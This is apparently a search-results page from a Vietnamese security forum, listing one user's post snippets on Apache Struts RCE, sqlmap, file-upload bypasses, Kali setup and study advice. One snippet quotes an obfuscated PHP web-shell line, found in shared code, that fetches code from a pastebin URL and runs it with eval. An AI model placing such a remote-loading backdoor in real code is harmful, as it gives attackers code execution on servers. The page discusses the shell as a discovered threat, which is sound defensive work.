Kết quả tìm kiếm

  1. krone

    Khai thác lỗi Apache Struts - Exploit

    Đầu tháng 3 vừa qua chúng ta đã được chứng kiến sự ra mắt lỗi từ CVE 2017-5638 bắt nguồn từ Apache Struts. Lỗi này xuất hiện trên 2 triệu trang web đang sử dụng kiến trúc của Struts cho Apache. Lỗi khá nghiêm trọng có thể dẫn đến Remote Code Excutive - RCE, khiến ta có thể tạo backdoors, chiếm...
  2. krone

    Tổng hợp Write-up cuộc thi An ninh mạng WhiteHat Challenge 02

    Like cho bạn UIT ^^
  3. krone

    Em mới tìm thấy vài con shell trong các bộ code share trên mạng

    Nếu shell này liên tục load về các file có dung lượng lớn thì khá phiền phức :3. Xem như một kiểu Dos trực tiếp :3.
  4. krone

    Em mới tìm thấy vài con shell trong các bộ code share trên mạng

    ${"GLOBLS"}["wwzlwsv"]="Mrion00";${${"GLOBALS"}["wwzlwsvc"]}=fiel_get_contents("http://pastebin.com/raw/tVRt1K5D");$vvpmto="Marion01";eval(${$vvpmto}); Con shell của nó load về đây bạn trẻ :D Mình đang dùng đt nên ko thử hết các link liên tục của nó được. Nhưng về cơ bản nó sẽ liên tục gọi...
  5. krone

    Góc nhờ vả: phương pháp để code tốt hơn

    Theo bản thân mình thì cái vụ này mình cũng đã mắc phải và giờ cũng đang tìm cách cải thiện :D. Và một trong vài hướng đi của mình thì mình đang làm theo như trong bài viết này: https://techmaster.vn/posts/33462/tu-hoc-lap-trinh-truc-tuyen Thực sự mà nói thì vấn đề của bạn cũng như mình, không...
  6. krone

    Hướng dẫn sử dụng SQLMAP để khai thác SQL Injection

    Bạn nên hiểu là sqlmap là một tool opensource, và nó được chạy trên Python. Mod #nonelldd thực ra là đang dùng source bên ngoài chưa được gán vào Variable Environment. trong kali thì có sẵn. hoặc bạn có thể download sqlmap từ source này. http://sqlmap.org/
  7. krone

    Học ngành an ninh mạng ở Học viện kỹ thuật mật mã hay Bưu chính?

    Theo thông tin về các đội chơi CTF liên quan đến an ninh Mạng thì Kỹ Thuật Mật Mã có vẻ nổi trội hơn thể hiện được khả năng đào tạo cũng tốt hơn, song song với đó thì bên đó khối ngành học của nó cũng đa dạng hơn. Bạn có thể chọn hướng mà mình thích dễ dàng hơn :-). Đương nhiên Học viện Kỹ Thuật...
  8. krone

    Hỏi về DNS để vào Web

    Maybe another way called be "PROXY".
  9. krone

    Giúp em về việc xóa User đã cũ trong windows (xóa hoàn toàn dữ liệu luôn ấy)

    Ca này có vẻ khó nhể, user đã cũ có lẽ được quản trị bởi User Account Managerent trong Control Panel :3. Bạn thử làm theo hướng dẫn trong bài viết này nhé :-) https://www.howtogeek.com/howto/6619/beginner-geek-delete-user-accounts-in-windows-7/
  10. krone

    Cảnh báo Website chèn mã độc lừa người dùng cài đặt phần mềm độc hại

    Mọi người sao ko chuyển hướng sang linux based system để phân tích cho tình huống này nhỉ :-). Mình thấy nên phân tích các tình huống tấn công dẫn đến website có thể bị deface chứ nhỉ :D!
  11. krone

    RCE vulnerable và cách khai thác

    RCE là gì ? RCE là viết tắt của Remote Code Execution - Thực thi code từ xa. Tức là bạn có thể thông qua một kĩ thuật nào đó để có thể đạt được quyền điều khiển trên máy nạn nhân, thông qua đó có thể thực thi bash, shell...hoặc code của một vài ngôn ngữ kịch bản như python, perl...
  12. krone

    Hỏi cách xóa windows sau khi cài Kali dual win

    https://kienictns.wordpress.com/2015...ali-linux-2-0/ Bạn có thể tham khảo ở đây để cài bộ ibus-unikey :-).
  13. krone

    Hỏi cách xóa windows sau khi cài Kali dual win

    ý là cũng có thể muốn xóa hoàn toàn :D. Nhưng nếu như bạn ở trên thì làm cách như bác DDos cũng được. Ngày đó em lại muốn xóa Linux lại khác :D. Boot option tùy từng máy nó ko cho pick :D.
  14. krone

    Hỏi cách xóa windows sau khi cài Kali dual win

    Cũng phải cẩn thận vì tùy vào lúc bạn cài đặt kali trước hay sau window. Grub-loader của kali có nằm đè lên của window hay ko hay là nằm riêng về phân vùng sda. Nếu là phân vùng của sda thì chỉ cần vào BIOS của máy sửa lại boot option là được. Còn nếu là về phía window thì chịu khó update lại...
  15. krone

    Thắc mắc về học phần mềm và an ninh mạng

    Đúng là không phải ai cũng tài năng cả, thế nên cần cù bù khả năng :-). Hiện tại nếu như là bạn muốn bắt đầu, hãy bắt đầu code. MÌnh một thời gian cũng nhảy hẳn sang security, thế nhưng khi nhìn lại, mình chẳng code gì được...thế là bây giờ lại nhảy qua lại code, code web, code script support...
  16. krone

    Em bị vấn đề khi cài kali trên máy ảo

    Nếu mình nhìn không nhầm thì bạn này bị dính lỗi máy không hỗ trợ hoặc chưa enable chế độ Virtualization trong BIOS :3. Bạn có thể viết rõ cái lỗi hoặc làm sao đó có thể cho hình chụp desktop rõ hơn được ko :3 ?
  17. krone

    Cảnh báo cuộc gọi lạ từ đầu số quốc tế và cách xử lý

    Mình mới thấy cái Truecaller bên iOS còn dùng có vài chức năng oke, bên Android thì chỉ thấy Call Blacklist là oke thôi :3. cái BMS nớ ko thấy được review tốt cho lắm nên cũng thôi :v.
  18. krone

    Cảnh báo cuộc gọi lạ từ đầu số quốc tế và cách xử lý

    CẢNH BÁO CUỘC GỌI LẠ TỪ ĐẦU SỐ QUỐC TẾ VÀ CÁCH XỬ LÝ Thời gian sau tết trong vòng 4,5 ngày trở lại gần đây. Nhiều khách hàng, thuê bao sử dụng dịch vụ của nhà mạng MobiFone đã nhận được các cuộc “nháy máy” lạ có đầu số đến từ các thuê bao ở nước ngoài. Cũng như tình trạng xảy ra vào tháng 11...
  19. krone

    Thắc mắc về học phần mềm và an ninh mạng

    Học phần mềm thì cơ bản là xây dựng chương trình, học về an ninh mạng cơ bản là bạn phải phá hoại chương trình :D. Làm thì khó mà phá thì dễ :D. Nhưng thực ra thì ngược lại, làm đã khó, nhưng muốn phá được thì chính bạn phải làm được, đồng nghĩa với việc nếu bạn không tự xây lên nó được thì bằng...
  20. krone

    5 cách khai thác lỗ hổng upload file

    Double extension :D and Nullbyte Extension :3. Có khi để vậy cũng hay rồi mà :D.
Bên trên